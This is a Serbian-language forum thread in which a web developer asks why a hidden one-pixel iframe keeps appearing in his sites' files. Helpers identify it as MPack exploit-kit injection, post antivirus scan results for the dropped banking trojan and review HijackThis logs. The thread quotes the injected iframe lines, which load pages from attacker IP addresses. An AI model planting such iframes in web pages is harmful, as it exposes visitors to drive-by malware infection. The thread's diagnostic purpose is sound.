|
Poslao: 15 Nov 2007 22:43
|
offline
- Stenley
- Zaslužni građanin
- Pridružio: 01 Mar 2005
- Poruke: 549
- Gde živiš: Apatin
|
Sajtovi na kojima ja imam FTP pristup pojavljuje se ovaj kod:
<iframe src='http://81.95.149.77/t.php' width='1' height='1' style='visibility:hidden'></iframe>
Kako da resim ovaj problem?
Sta tacno taj virus radi?
|
|
|
|
|
|
|
Poslao: 15 Nov 2007 22:51
|
offline
- bobby
- Administrator
- Pridružio: 04 Sep 2003
- Poruke: 24135
- Gde živiš: Wien
|
Mrtav, nema nikakav odziv.
Lici mi na Storm worm, ali ne mogu a tvrdim nista posto ne mogu da otvorim sajt da vidim sta radi.
|
|
|
|
|
|
|
|
|
Poslao: 16 Nov 2007 08:18
|
offline
- bobby
- Administrator
- Pridružio: 04 Sep 2003
- Poruke: 24135
- Gde živiš: Wien
|
Sajt ili server je bio haknut.
E sada, sta su koristili od propusta da bi to uradili - nemam ideju jer ne snam sta imate na serveru.
Generalno, treba uraditi update kompletnog softvera koji se koristi na tom serveru (Apache, phpBB, sta vec ima)
|
|
|
|
|
|
|
Poslao: 16 Nov 2007 09:53
|
offline
- NuLLCoDe
- Legendarni građanin
- Đuro Glumac
- dipl. ing. informatike
- Pridružio: 08 Feb 2004
- Poruke: 3640
- Gde živiš: ApAtIn
|
There is a hot new hacking attempt making the rounds lately called Javascript iframe injection. The hacker injects code into your files which they then use to try to obtain all sorts of information about your shop, server and your visitors computer. They probably can't get too much information on a properly setup server but there are a lot out there that are not setup properly.
Besides the above, one of the affects this code has is that it casues google to list your site with a message that says, "This site may harm your computer." Google is using the results of a company named stopbadware.org, which checks websites for this type of code. If they find it, they will then report it to google, who in turns adds the warning about your site. However, neither of them will notify the shop owner about it so your site could be infected and listed with a serious warning and you wouldn't know it until you noticed the listing on google.
To check if your site is infected, search your files for
- iframe (not used in most oscommerce shops)
- a line of code that starts with <script language="JavaScript">e
- a string of letters like AAAAAAAA
Any of the above could be in an oscommerce shop legitimately, although it is probably unlikely. If it is, then you need to look closer at the code to see if it belongs there. Keeping a known, good backup of your files on your computer to compare against is always a good idea.
Dopuna: 16 Nov 2007 9:53
I jos malo detaljnije o ovome na http://virtuelvis.com/archives/2007/06/dreamhost-hacked
|
|
|
|
|
|
|
Poslao: 18 Nov 2007 04:36
|
offline
- Stenley
- Zaslužni građanin
- Pridružio: 01 Mar 2005
- Poruke: 549
- Gde živiš: Apatin
|
<iframe src='http://78.109.21.114/t.php' width='1' height='1' style='visibility: hidden;'></iframe>
Ljudi nije server problem, problem je moj racunar.
Kako da uklonim taj "virus" na mome racunaru?
|
|
|
|
|
|
|
Poslao: 18 Nov 2007 09:09
|
offline
- bobby
- Administrator
- Pridružio: 04 Sep 2003
- Poruke: 24135
- Gde živiš: Wien
|
Stenley, igramo se macke i misa ovako.
Daj malo bolje objasni situaciju:
- gde ti se pojavljuje taj kod (browser, html fajlovi na tvom HDu...)
- ako su to neki sajtovi sa neta, daj neku adresu da i mi pogledamo
- ako su to neki sajtovi koje ti pravis, mislis li da ti je komp zarazen pa ti nesto non-stop ubacuje te linije u fajlove koje spremas za upload.
Znaci, ako je nesto kod tebe na kompu onda daj HijackThis log, imas uputstvo u temama obelezenim sa Vazno u ovom forumu.
Ako su neki sajtovi, daj linkove pa da ih proverimo.
Dopuna: 18 Nov 2007 9:09
Ispitao sam ovu zadnju adresu, u pitanju je MPack paket exploita.
Fajl koji taj MPack pokusa da ubaci na komp ima sledecu detekciju (skoro nikakvu):
File file2.exe received on 11.18.2007 08:58:16 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.11.17.0 2007.11.16 -
AntiVir 7.6.0.34 2007.11.16 -
Authentium 4.93.8 2007.11.17 -
Avast 4.7.1074.0 2007.11.18 -
AVG 7.5.0.503 2007.11.17 Obfustat.ZUS
BitDefender 7.2 2007.11.18 -
CAT-QuickHeal 9.00 2007.11.17 (Suspicious) - DNAScan
ClamAV 0.91.2 2007.11.18 -
DrWeb 4.44.0.09170 2007.11.17 -
eSafe 7.0.15.0 2007.11.14 Suspicious File
eTrust-Vet 31.2.5304 2007.11.17 -
Ewido 4.0 2007.11.17 -
FileAdvisor 1 2007.11.18 -
Fortinet 3.11.0.0 2007.10.19 -
F-Prot 4.4.2.54 2007.11.16 -
F-Secure 6.70.13030.0 2007.11.17 -
Ikarus T3.1.1.12 2007.11.18 -
Kaspersky 7.0.0.125 2007.11.18 -
McAfee 5165 2007.11.16 -
Microsoft 1.3007 2007.11.18 PWS:Win32/Bankrypt.gen
NOD32v2 2665 2007.11.17 -
Norman 5.80.02 2007.11.16 -
Panda 9.0.0.4 2007.11.17 Suspicious file
Prevx1 V2 2007.11.18 -
Rising 20.18.60.00 2007.11.18 -
Sophos 4.23.0 2007.11.18 -
Sunbelt 2.2.907.0 2007.11.17 VIPRE.Suspicious
Symantec 10 2007.11.18 Infostealer.Banker.C
TheHacker 6.2.9.133 2007.11.17 -
VBA32 3.12.2.5 2007.11.16 -
VirusBuster 4.3.26:9 2007.11.17 -
Webwasher-Gateway 6.0.1 2007.11.16 Win32.Malware.gen!70 (suspicious)
Additional information
File size: 45568 bytes
MD5: b65929386b4f82f654fe5aa5608fe3a9
SHA1: 85d095efe2c1a0a227373ce8f9e1c31efa8e5f6d
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
|
|
|
|
|
|
|
Poslao: 18 Nov 2007 12:27
|
offline
- Stenley
- Zaslužni građanin
- Pridružio: 01 Mar 2005
- Poruke: 549
- Gde živiš: Apatin
|
Ok ajde polako da ga ulovimo 
- kod se pojavljuje u fajlovima sa nazivom index i login (nebitno html ili php)
- Sajtovi su online, ali sada nemam mogucnosti da vam prikazem to jer sam uklonio kod gde se pojavio, ali bez brige pojavice se on opet za par dana.
- da to su sajtovi koje ja pravim i ja imam FTP pristup ali sto je najgore neki sajtovi su u cistom Html-u znaci nema formi za upload itd.. sve dozvole su dobro podesene (nema nigde 777) i pretresao sam ceo sajt nema nikakvog sumnjivog JS, php ili nekog drugog koda koji bi ponovo sam na serveru ubacivao taj sporni kod u index.html znaci ostaje samo jedna opcija da moj racunar to radi sam bez mog znanja i dozvole u nekom pozadinskom procesu.
Kao FTP klijent koristim FileZill-u i svi passwordi su snimljeni u njoj.
HijackThis log:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:24:25, on 18.11.2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
c:\xampp\apache\bin\apache.exe
C:\xampp\mysql\bin\mysqld-nt.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\svchost.exe
C:\xampp\apache\bin\apache.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\UMonit.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Winamp\winamp.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\Program Files\Skype\Plugin Manager\SkypePM.exe
C:\Program Files\The Bat!\thebat.exe
C:\Program Files\ICQLite\ICQLite.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\notepad.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common
Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet
Explorer\SkypeIEPlugin.dll
O2 - BHO: flashget urlcatch - {2F364306-AA45-47B5-9F9D-39A8B94E7EF7} - C:\Program Files\FlashGet\jccatch.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program
Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll
O2 - BHO: FlashGet GetFlash Class - {F156768E-81EF-470C-9057-481BA8380DBA} - C:\Program Files\FlashGet\getflash.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [UMonit] C:\WINDOWS\system32\UMonit.exe
O4 - HKLM\..\Run: [ICQ Lite] "C:\Program Files\ICQLite\ICQLite.exe" -minimize
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\RunOnce: [ICQ Lite] C:\Program Files\ICQLite\ICQLite.exe -trayboot
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O8 - Extra context menu item: &Download All with FlashGet - C:\Program Files\FlashGet\jc_all.htm
O8 - Extra context menu item: &Download with FlashGet - C:\Program Files\FlashGet\jc_link.htm
O8 - Extra context menu item: Append to existing PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\system32\msjava.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\system32\msjava.dll
O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program
Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet
Explorer\SkypeIEPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Program Files\ICQLite\ICQLite.exe
O9 - Extra 'Tools' menuitem: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Program Files\ICQLite\ICQLite.exe
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe
O9 - Extra 'Tools' menuitem: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program
Files\Messenger\msmsgs.exe
O16 - DPF: {5D69485C-EAB1-42AE-93C1-B5A53F238C5A} (FileInterface Class) -
https://online.bancaintesabeograd.com/RetailDLL/FSINT.dll
O16 - DPF: {76326493-E84F-4D4B-939C-1E07B50037F2} (ProxyModule Class) -
https://online.bancaintesabeograd.com/RetailDLL/SGCMSCCD.DLL
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) -
http://messenger.zone.msn.com/binary/ZIntro.cab56649.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) -
http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
O16 - DPF: {E6187999-9FEC-46A1-A20F-F4CA977D5643} (ZoneChess Object) -
http://messenger.zone.msn.com/binary/Chess.cab57176.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{C72106D4-8F9E-480D-B84D-78814D34522E}: NameServer = 212.200.166.8 212.200.166.6
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: Apache2.2 - Apache Software Foundation - c:\xampp\apache\bin\apache.exe
O23 - Service: mysql - Unknown owner - C:\xampp\mysql\bin\mysqld-nt.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: XAMPP Service (XAMPP) - Unknown owner - c:\xampp\service.exe
--
End of file - 7811 bytes
|
|
|
|
|
|
|
Poslao: 18 Nov 2007 12:36
|
offline
- bobby
- Administrator
- Pridružio: 04 Sep 2003
- Poruke: 24135
- Gde živiš: Wien
|
Iskljuci WordWrap u Notepadu pre nego sto iskopiras log.
Opet se ne razumemo.
Postoje dve mogucnosti da HTML na sajtu bude zarazen:
- da na serveru postoji neki proces koji patchuje tvoj sajt
- da nesto na tvom kompu menja html fajlove pre uploada
Nije moguce da nesto samo pokrece upload fajlova na server, pa da tako inficira fajlove.
Meni je bitno da znam da li su HTML fajlovi na tvom licnom kompu isto inficirani, tako da ih ti uploadujes vec inficirane. Ovo bih te zamolio da proveris iz Notepada pre uploada, ne iz browsera.
Ukoliko si 100% siguran da su fajlovi OK pre nego sto ih postavis na server, onda znaci da je server kompromitovan.
Sledece, nemoj fajlove sa servera da proveravas u browseru, vec ih skini opet preko FTP-a, pa ih proveri u Notepadu.
Moze biti da je tvoj browser inficiran pa te linije ubacuje pri pregledu sajta iz browsera. Naravno, to se manifestuje samo lokalno, kod tebe. Browser ne moze da zarazi fajlove na serveru time sto ih je otvorio za gledanje/citanje.
Dopuna: 18 Nov 2007 12:36
Promeni ovde i ime foldera kao i ime samog programa:
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
Ne sme nista da asocira na HijackThis.
|
|
|
|
|
|
|
Poslao: 18 Nov 2007 13:04
|
offline
- Stenley
- Zaslužni građanin
- Pridružio: 01 Mar 2005
- Poruke: 549
- Gde živiš: Apatin
|
Prvu mogucnost iskljucujem zato sto nisu zarazeni svi sajtovi na serveru, tacnije zarazeni su samo sajtovi na kojima ja imam FTP pristup znaci ja sam izvor zaraze a i admin je pregledao server i sve je OK.
Nesto na mom kompjuteru menja fajlove i SAM ih uploaduje bez moga znanja.
Nijedan fajl u localhostu nije inficiran.
Mislio sam i da je do toga ali nije, proverio sam(koristim FF).
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 13:02:05, on 18.11.2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
c:\xampp\apache\bin\apache.exe
C:\xampp\mysql\bin\mysqld-nt.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\svchost.exe
C:\xampp\apache\bin\apache.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\UMonit.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Winamp\winamp.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\Program Files\Skype\Plugin Manager\SkypePM.exe
C:\Program Files\The Bat!\thebat.exe
C:\Program Files\ICQLite\ICQLite.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\notepad.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: flashget urlcatch - {2F364306-AA45-47B5-9F9D-39A8B94E7EF7} - C:\Program Files\FlashGet\jccatch.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll
O2 - BHO: FlashGet GetFlash Class - {F156768E-81EF-470C-9057-481BA8380DBA} - C:\Program Files\FlashGet\getflash.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [UMonit] C:\WINDOWS\system32\UMonit.exe
O4 - HKLM\..\Run: [ICQ Lite] "C:\Program Files\ICQLite\ICQLite.exe" -minimize
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\RunOnce: [ICQ Lite] C:\Program Files\ICQLite\ICQLite.exe -trayboot
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O8 - Extra context menu item: &Download All with FlashGet - C:\Program Files\FlashGet\jc_all.htm
O8 - Extra context menu item: &Download with FlashGet - C:\Program Files\FlashGet\jc_link.htm
O8 - Extra context menu item: Append to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\system32\msjava.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\system32\msjava.dll
O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Program Files\ICQLite\ICQLite.exe
O9 - Extra 'Tools' menuitem: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Program Files\ICQLite\ICQLite.exe
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe
O9 - Extra 'Tools' menuitem: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {5D69485C-EAB1-42AE-93C1-B5A53F238C5A} (FileInterface Class) - https://online.bancaintesabeograd.com/RetailDLL/FSINT.dll
O16 - DPF: {76326493-E84F-4D4B-939C-1E07B50037F2} (ProxyModule Class) - https://online.bancaintesabeograd.com/RetailDLL/SGCMSCCD.DLL
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zone.msn.com/binary/ZIntro.cab56649.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
O16 - DPF: {E6187999-9FEC-46A1-A20F-F4CA977D5643} (ZoneChess Object) - http://messenger.zone.msn.com/binary/Chess.cab57176.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{C72106D4-8F9E-480D-B84D-78814D34522E}: NameServer = 212.200.166.8 212.200.166.6
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: Apache2.2 - Apache Software Foundation - c:\xampp\apache\bin\apache.exe
O23 - Service: mysql - Unknown owner - C:\xampp\mysql\bin\mysqld-nt.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: XAMPP Service (XAMPP) - Unknown owner - c:\xampp\service.exe
--
End of file - 7811 bytes
|
|
|
|
|
|
